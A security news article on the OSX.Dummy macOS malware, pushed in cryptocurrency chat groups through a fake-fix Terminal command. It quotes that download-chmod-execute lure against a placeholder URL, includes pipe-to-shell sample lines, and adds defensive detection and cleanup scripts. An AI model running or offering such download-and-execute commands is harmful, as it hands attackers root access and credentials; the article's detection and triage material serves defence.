Security researchers have discovered a new piece of macOS malware being pushed in cryptocurrency-related Slack and Discord chat groups. Remco Verhoef, founder of DutchSec, wrote that he spotted criminals posing as admins or moderators of the cryptocurrency channels and posting messages that urged users to paste a long command into Terminal, supposedly to fix a number of problems.

"cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script"

The command downloads a 34 MB binary named “script” into /tmp, marks it executable and runs it on the victim’s machine. Apple should be able to flag and block a malicious binary like this one, but Gatekeeper only evaluates files that carry the com.apple.quarantine extended attribute, which browsers and other Apple applications set on downloads and curl does not. A file fetched with curl and launched directly from Terminal therefore never goes through that check, and so far Apple’s protections have not stopped it.
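What makes the lure recognisable is its shape rather than any particular URL: fetch with curl, redirect into a file, chmod +x, run it from the current directory. The script below is an added example, not code from Verhoef’s or anyone else’s analysis; it flags that shape (and the common pipe-to-shell variants) in command lines, as one would run it over shell history, EDR process events or messages pulled from a chat channel. The sample command lines and the example.com URLs are constructed for the demonstration.

```shell
#!/bin/sh
# dropper_oneliner.sh: flag "download, chmod +x, execute" command lines such as the
# one pushed in the OSX.Dummy lure, plus the usual pipe-to-shell variants.
# Example code added for this article; the sample command lines below are constructed.

# Returns 0 (true) if the command line in $1 looks like a shell dropper, 1 otherwise.
# Pattern 1: curl ... > file (or -o/-O) ; chmod +x ... ; ./file   (the OSX.Dummy shape)
# Pattern 2: curl|wget ... | [sudo] sh/bash/zsh                    (pipe to shell)
# Pattern 3: sh/bash/zsh <(curl ...)                               (process substitution)
is_dropper_oneliner() {
  printf '%s\n' "$1" | grep -Eq \
    -e 'curl[^|;&]*(>|-o|-O)[^|;&]*(&&|;)[^|;&]*chmod[^|;&]*[+]x[^|;&]*(&&|;)[^|;&]*\./' \
    -e '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)' \
    -e '(ba|z)?sh[[:space:]]+<[(]curl'
}

# Reads command lines from stdin, writes each flagged line to stderr with a
# "FLAGGED:" prefix, and prints the number of flagged lines to stdout.
count_droppers() {
  n=0
  while IFS= read -r line; do
    if is_dropper_oneliner "$line"; then
      n=$((n + 1))
      printf 'FLAGGED: %s\n' "$line" >&2
    fi
  done
  printf '%s\n' "$n"
}

# Constructed sample input: the redacted one-liner as Verhoef quoted it, two
# pipe-to-shell variants, and two benign commands that must not be flagged.
SAMPLE_LOG='cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
curl -fsSL https://example.com/install.sh | sudo bash
bash <(curl -s https://example.com/setup.sh)
curl -O https://example.com/archive.tar.gz && tar xf archive.tar.gz
ls -la /tmp'

# Usage: sh dropper_oneliner.sh --demo   (three FLAGGED lines on stderr, then "3")
if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_LOG" | count_droppers
fi
```

The first pattern is deliberately tolerant of whatever sits between the pieces (flags, the doubled “curl”, the redirect target name), because the lure can be re-worded freely while the download-then-execute sequence cannot. Feed real shell history or process command lines through count_droppers and review the FLAGGED output by hand; the benign archive download in the sample shows why a bare “curl -O” is not enough to trigger it.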

Once executed, the malware runs sudo to change the ownership of the script to root, which prompts the victim for their password in Terminal. The malware captures the password as it is typed and saves it in plaintext to /tmp/dumpdummy. It then installs a launch daemon so that the script is executed automatically every time the system reboots, which gives it persistence. Named OSX.Dummy, the malware thus survives a restart without any further action from the victim.

Crude as the social engineering is, the attack has apparently been working: criminals have been tricking users into running this command to fix a myriad of issues on their Macs. Once the infected machine connects to the remote command-and-control server, the attackers can execute arbitrary commands on it as root. Beyond that remote shell, the malware’s capabilities are reportedly limited.

One worry, however, is the saving of the Mac password in plaintext. The file holds the user’s login password, which on an admin account is the password sudo accepts to become root, and it holds it unencrypted. Even if the user removes OSX.Dummy but the cleanup is not thorough, any future malicious program can read that locally stored file; and since the malware has already read the password itself, deleting the file is not enough, the password has to be changed.
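Cleaning up after OSX.Dummy therefore means more than deleting the binary: the launch daemon, the dropped script and the plaintext password file all have to go, and the account password has to be changed. The script below is an added example, not code from Verhoef’s or Reed’s analyses, that scans for the artefacts named in this article and removes them. It assumes the persistence mechanism is a plist under /Library/LaunchDaemons whose program path points into a temporary directory or root’s home; that heuristic, and the TRIAGE_ROOT prefix that lets the logic run against a fake directory tree, are assumptions of the example rather than details from the article.

```shell
#!/bin/sh
# osx_dummy_triage.sh: check a Mac for the OSX.Dummy artefacts this article describes
# (/tmp/script, /tmp/dumpdummy, a persistence LaunchDaemon) and clean them up.
# Example code added for this article, not from the published analyses.
# Assumption (not stated in the article): the launch daemon is a plist under
# /Library/LaunchDaemons pointing at the dropped script, so any LaunchDaemon whose
# <string> paths start under /tmp, /private/tmp, /var/tmp or /var/root is treated
# as suspect. Review the scan output before running clean.
# Usage on a live system (needs root to touch LaunchDaemons):
#   sudo sh osx_dummy_triage.sh scan
#   sudo sh osx_dummy_triage.sh clean
# TRIAGE_ROOT=/some/dir prefixes every path, so the logic can be exercised on a fake tree.

# Prints each artefact found under $1 (root prefix, "" for the live system), one per
# line as "artifact: <path>" or "launchdaemon: <path>".
# Returns 0 if anything was found, 1 if the machine looks clean.
find_dummy_artifacts() {
  root="$1"
  found=1
  for f in "$root/tmp/dumpdummy" "$root/tmp/script"; do
    if [ -e "$f" ]; then
      printf 'artifact: %s\n' "$f"
      found=0
    fi
  done
  for plist in "$root"/Library/LaunchDaemons/*.plist; do
    [ -f "$plist" ] || continue
    if grep -Eq '<string>/(private/)?(tmp|var/tmp|var/root)/' "$plist"; then
      printf 'launchdaemon: %s\n' "$plist"
      found=0
    fi
  done
  return $found
}

# Removes everything find_dummy_artifacts reports. On a live system the daemon is
# unloaded and any running copy of the script killed before the files are deleted.
# Deleting /tmp/dumpdummy does not make the password safe: the malware has already
# read it, so the account password must be changed regardless.
clean_dummy_artifacts() {
  root="$1"
  find_dummy_artifacts "$root" | while IFS=' ' read -r kind path; do
    case "$kind" in
      launchdaemon:)
        if [ -z "$root" ] && command -v launchctl >/dev/null 2>&1; then
          launchctl unload "$path" 2>/dev/null || true
        fi
        rm -f "$path"
        ;;
      artifact:)
        if [ -z "$root" ] && command -v pkill >/dev/null 2>&1; then
          pkill -f "$path" 2>/dev/null || true
        fi
        : > "$path"   # truncate first; on APFS/SSDs an overwrite is no guarantee anyway
        rm -f "$path"
        ;;
    esac
    printf 'removed: %s\n' "$path"
  done
}

case "${1:-}" in
  scan)  find_dummy_artifacts "${TRIAGE_ROOT:-}" && echo "indicators found" || echo "clean" ;;
  clean) clean_dummy_artifacts "${TRIAGE_ROOT:-}"; echo "now change the account password" ;;
esac
```

The plist heuristic is intentionally broader than this one sample: a LaunchDaemon that runs anything out of a temporary directory is worth a look whatever its name, and matching on the dropped file’s location rather than on a daemon label keeps the check useful if the attackers rename it. Run scan first and read the list; clean removes exactly what scan printed.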

“We don’t yet know exactly what the hackers behind the malware may intend to do with access to the infected machines,” Malwarebytes’s Thomas Reed wrote. “But given the fact that cryptocurrency mining communities were targeted, it’s a fair bet that they were interested in theft of cryptocurrency.”

– For more technical details, check out Verhoef’s analysis.